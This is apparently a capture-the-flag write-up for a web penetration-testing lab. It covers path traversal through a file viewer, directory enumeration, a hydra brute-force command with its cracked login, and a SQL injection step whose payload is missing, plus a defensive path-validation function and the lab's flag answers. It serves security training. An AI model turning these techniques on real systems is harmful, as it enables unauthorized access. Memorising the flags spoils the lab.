Web Application Penetration Testing CTF 1
Overview
Web Application Penetration Testing is a critical process in identifying and exploiting vulnerabilities within web applications to assess their security posture. This type of testing simulates real-world attacks to uncover weaknesses such as SQL Injection, Cross-Site Scripting (XSS), Local File Inclusion (LFI), and others that could be exploited by malicious actors. Penetration testers use a combination of automated tools and manual techniques to probe the application for vulnerabilities, validate their impact, and suggest mitigation strategies. By performing these tests, organizations can identify potential security flaws before they are exploited by attackers, ensuring the integrity and confidentiality of sensitive data and safeguarding the application from future threats.
This lab is designed to test your knowledge and skills in identifying web application vulnerabilities and uncovering hidden information on a target web server.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.
Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.
Useful wordlists:
/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
Writeup
Flag 1
Sometimes, important files are hidden in plain sight. Check the root ('/') directory for a file named 'flag.txt' that might hold the key to the first flag.
The target is: http://target.ine.local
On this website we can see some files. The URL of the file viewer is http://target.ine.local/view_file?file=file1.txt. Just replace file1.txt with /flag.txt:
FLAG1_5c50a28853064c69be90a268498a955c
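The first flag works because the viewer passes the file parameter straight to the filesystem. As an added example that is not part of the lab or this writeup, the following Python function shows the check such a view_file endpoint needs on the server side: the function name resolve_view_file, the FILES_DIR base directory and the sample inputs are all constructed for illustration.

```python
import os
from pathlib import Path

# Constructed base directory for the viewer; not a path from the lab.
FILES_DIR = Path("/var/www/app/files")


def resolve_view_file(user_value: str, base_dir: Path = FILES_DIR):
    """Return the path to serve for ?file=<user_value>, or None to refuse.

    Refuses absolute paths (file=/flag.txt), any directory component
    (file=../flag.txt, file=secured/flag.txt) and NUL bytes, then resolves
    symlinks and confirms the result still lies inside base_dir.
    """
    if not user_value or "\x00" in user_value:
        return None
    # Only a bare file name is acceptable: the name must equal the whole value.
    if os.path.isabs(user_value) or Path(user_value).name != user_value:
        return None
    base = base_dir.resolve()
    candidate = (base / user_value).resolve()
    # resolve() follows symlinks, so a link pointing outside base_dir is caught.
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs: the first mirrors the lab's legitimate use,
    # the rest mirror the kinds of values the endpoint must refuse.
    for value in ["file1.txt", "/flag.txt", "../flag.txt", "secured/flag.txt", ".."]:
        print(f"{value!r:22} -> {resolve_view_file(value)}")
```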
Flag 2
Explore the structure of the server's directories. Enumeration might reveal hidden treasures.
Let's enumerate it using dirbuster:
Dir found: / - 200
File found: /login - 200
File found: /about - 200
File found: /view_file - 200
Dir found: /secured/ - 200
In the folder secured there is a flag.txt file.
FLAG2_f4116b6c0409404ea27e62b790a6f417
Flag 3
The login form seems a bit weak. Trying out different combinations might just reveal the next flag.
Let's go to the login page and use these wordlists to bruteforce a user:
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
I use hydra with the http-post-form module, treating responses that contain the error message "Invalid username or password" as failed attempts:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /root/Desktop/wordlists/100-common-passwords.txt \
target.ine.local http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid username or password" \
-f -V
[80][http-post-form] host: target.ine.local login: guest password: butterfly1
[STATUS] attack finished for target.ine.local (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-25 16:40:56
Logging in with guest:butterfly1, we can find the third flag:
FLAG3_0dabb1ebdb6240e1864aa0265f06f3ee
Flag 4
The login form behaves oddly with unexpected inputs. Think of injection techniques to access the 'admin' account and find the flag.
I tried putting some characters in the password field and it gave me an Internal Server Error. Good news: it can be a SQLi. Using Burp Suite I tried some combinations. This simple combination works:
FLAG4_7d55199cd331470db7ba3449844dc834